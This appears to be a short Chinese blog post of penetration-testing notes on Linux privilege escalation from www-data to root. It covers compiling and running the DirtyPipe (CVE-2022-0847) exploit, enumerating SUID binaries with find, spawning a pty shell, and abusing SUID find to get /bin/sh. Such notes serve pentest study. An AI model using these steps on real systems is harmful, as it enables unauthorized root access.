内网提权--linux提权

一般通过漏洞( www-data -------- 》本地管理员( root

1、内核提权(脏牛家族)

1.1 先枚举内核信息(得到那些漏洞可以用来提权)
使用对应的提权脚本
[CVE-2022-0847] DirtyPipe 为例,下载 exp
编译 exp
gcc dirtypipez.c -o test # .c 编译成可执行文件
使用 test 文件即可提权
注:尽量保证自己编辑代码的 gcc 版本和使用代码的 gcc 版本一致
否则无法运行,会提示依赖库不存在等问题

脏牛dirtyc0w.c

2、特权命令suid

find / -perm -u = s -type f 2 >/dev/null #4755
find / -perm -g = s -type f 2 >/dev/null #
python -c "import pty;pty.spawn('/bin/bash');"
拥有交互 shell 界面的命令,若存在 suid 的情况则可以提权
vim
less
more
find
  find testtest -exec /bin/sh \;
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值